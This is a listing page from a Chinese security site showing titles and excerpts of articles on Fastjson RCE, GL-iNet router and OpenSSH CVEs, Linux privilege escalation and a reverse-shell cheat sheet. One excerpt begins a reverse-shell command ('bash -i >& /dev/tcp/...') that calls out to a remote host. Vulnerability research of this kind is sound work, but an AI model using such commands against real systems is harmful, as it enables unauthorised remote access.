inet | CN-SEC 中文网

代码审计

超详细 | Fastjson RCE漏洞

Fastjson1.2.24-RCE漏洞简介fastjson是阿里巴巴的开源JSON解析库，它可以解析JSON格式的字符串，支持将Java Bean序列化为JSON字符串，也可以从JSON字符串反序列...

11月11日80 views评论

阅读全文

IoT工控物联网

GL-iNet路由器安全分析

前段时间看到复现分析GL-iNet路由器CVE-2024-39226漏洞的两篇文章，看完也跟着了分析下，固件仿真过程踩了一些坑，开始我直接用Ubuntu24的qemu-system-arm跟着操作都会...

11月09日29 views评论

阅读全文

多姿势弹shell 不怕姿势多，就怕记不住

反弹shell是我们最便捷的与目标建立连接的方式之一。本文为大家简单的汇总下常用的shell反弹姿势😘,希望对您的学习有所帮助。bashbash -i >& /dev/tcp/192.1...

11月01日安全文章16 views评论

阅读全文

IoT工控物联网

原创 Paper | GL-iNet 路由器 CVE-2024-39226 漏洞分析

作者：fan@知道创宇404实验室时间：2024年9月6日 1 前言参考资料8月5日网上披露了 CVE-2024-399226 [1]，影响多款GL-iNet路由器，随后开始漏洞应急。起初对GL-iN...

09月13日53 views评论

阅读全文

安全漏洞

CVE-2024-6387-OpenSSH远程代码执行

昨天发现OpenSSH居然出了远程命令执行的漏洞（网传核弹漏洞），心想那不得通杀互联网上的大部分linux，几乎都用的OpenSSH，这不得找来研究研究。Poc在github上找到的Poc，代码详情就...

07月03日62 views评论

阅读全文

安全文章

CVE-2023-4528：JSCAPE MFT 中的 Java 反序列化漏洞（已修复）

JSCAPE MFT安全托管文件传输产品中发现了 Java 反序列化漏洞。该漏洞后来被分配为 CVE-2023-4528。可以通过将 XML 编码的 Java 对象发送到 Manager Servic...

05月19日25 views评论

阅读全文

安全新闻

OpenTelemetry agent 对 Spring Boot 应用的影响：一次 SPI 失效的调查

背景前段时间公司领导让我排查一个关于在 JDK21 环境中使用 Spring Boot 配合一个 JDK18 新增的一个 SPI(java.net.spi.InetAddressResolverPro...

05月14日7 views评论

阅读全文

安全漏洞

GL.iNet 路由器身份验证绕过漏洞 (CVE-2023-46453)

点击上方蓝字关注我们免责声明本文仅用于参考和学习交流，对于使用本文所提供的信息所造成的任何直接或间接的后果和损失，使用者需自行承担责任。本文的作者以及本公众号团队对此不承担任何责任。请在使用本文内容时...

04月20日58 views评论

阅读全文

「翻译」阻止 DHCP 修改 resolv.conf 文件

原文于：https://www.vultr.com/docs/stop-dhcp-from-changing-resolve-conf前言最近在 vultr 新建了一个德国的 VPS ，由于我的某些需...

04月04日安全博客8 views评论

阅读全文

IoT工控物联网

记一次汽车T-BOX分析

Part1前言近期对汽车Tbox进行了一些逆向分析，由于只有一个零部件分析起来还是较为困难的，本次呢，针对TBOX对外开放服务进行了逆向分析，这里就分享一下过程。下一次我们将分析TSP->TBO...

06月13日72 views评论

阅读全文

安全百科

Windows常用cmd网络命令详解

请点击上面　　一键关注！内容来源：计算科学与信息化今天给大家分享Windows常用cmd网络命令，希望对大家能有所帮助！1、arp [option] [address] 显示/修改ARP缓...

05月17日54 views评论

阅读全文

linux提权

一、前言linux提权要比windows提权困难很多，其原因是因为linux有不同的发行版，内核跨度也比较大，很难找到通杀的exp。而且默认配置下，不存储明文密码...

03月15日安全文章40 views评论

阅读全文

超详细 | Fastjson RCE漏洞

GL-iNet路由器安全分析

多姿势弹shell 不怕姿势多，就怕记不住

原创 Paper | GL-iNet 路由器 CVE-2024-39226 漏洞分析

CVE-2024-6387-OpenSSH远程代码执行

CVE-2023-4528：JSCAPE MFT 中的 Java 反序列化漏洞（已修复）

OpenTelemetry agent 对 Spring Boot 应用的影响：一次 SPI 失效的调查

GL.iNet 路由器身份验证绕过漏洞 (CVE-2023-46453)

「翻译」阻止 DHCP 修改 resolv.conf 文件

记一次汽车T-BOX分析

Windows常用cmd网络命令详解

linux提权

在线咨询

微信